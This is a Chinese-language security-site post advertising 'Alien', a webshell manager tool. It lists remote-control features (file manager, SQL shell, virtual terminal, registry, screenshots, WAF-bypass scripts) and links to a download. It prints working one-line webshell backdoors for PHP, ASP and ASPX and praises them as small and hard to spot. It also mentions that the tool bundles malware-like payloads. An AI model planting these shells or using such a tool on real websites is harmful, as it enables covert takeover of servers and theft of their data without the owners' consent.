探索网络安全新技术
攀登黑客技术最高峰

Alien:Webshell Manager Tool / 一句话木马网站管理工具

工具简介

Alien一句话木马管理工具,可以用在渗透测试和网站的管理。

工具平台

Windows

编程语言

C# .NET Framework V4.8

新增功能

-FileManager
查目录权限

-Database
SQL Shell

-绕过WAF (Web防火牆)
绕过WAF的python放在\Utilitize\tamper

工具预览

Alien:Webshell Manager Tool / 一句话木马网站管理工具-威武网安

Alien:Webshell Manager Tool / 一句话木马网站管理工具-威武网安

Alien:Webshell Manager Tool / 一句话木马网站管理工具-威武网安

Alien:Webshell Manager Tool / 一句话木马网站管理工具-威武网安

Alien:Webshell Manager Tool / 一句话木马网站管理工具-威武网安

Alien:Webshell Manager Tool / 一句话木马网站管理工具-威武网安

功能展示

File Manager (可显示图片, 可SearchFile)
Virtual Terminal
Database
Registry
Monitor
Screenshot
System Information

注意事项

工具Payloads资料夹内有符合恶意程式的Payload, 可能会被防毒删除,目前只有删减版,但部份程式码没有删除,Disassemble应该会有奇怪但无法使用的东西。

一句话木马

一句话木马是在渗透测试中用来控制伺服器的工具,强大之处在于木马本身体积小,不易发现,以下是最简单的一句话木马:

PHP:<?php @eval($_POST[‘password’]);?>
ASP <%execute(request(“password”))%>
ASPX <%@ Page Language=“Jscript”%><%eval(Request.Item[“password”])%> 

还可以使用asmx, ashx等等的Webshell。
NodeJS & JSP https://github.com/malbuffer4pt/Alien/blob/main/shell.txt

关于JSP webshell

目前只有比较原始的菜刀版本, 之后可能会加上蚁剑和冰蝎
shell有进行更改, 新增了可以显示图片的功能

关于NodeJS webshell

由于NodeJS特性, 原理跟一般php asp aspx等动态语言的shell不同,
NodeJS目的重在管理而非渗透

工具下载

Alien v4.0.0

赞(0) 打赏
版权声明:本文采用知识共享 署名4.0国际许可协议 [BY-NC-SA] 进行授权
文章名称:《Alien:Webshell Manager Tool / 一句话木马网站管理工具》
文章链接:https://www.wevul.com/1600.html
本站所有内容均来自互联网,只限个人技术研究,禁止商业用途,请下载后24小时内删除。

评论 抢沙发

如果文章对你有帮助 可以打赏一下文章作者

非常感谢你的打赏,我们将继续提供更多优质内容,让我们一起创建更加美好的网络世界!

支付宝扫一扫打赏

微信扫一扫打赏

登录

找回密码

注册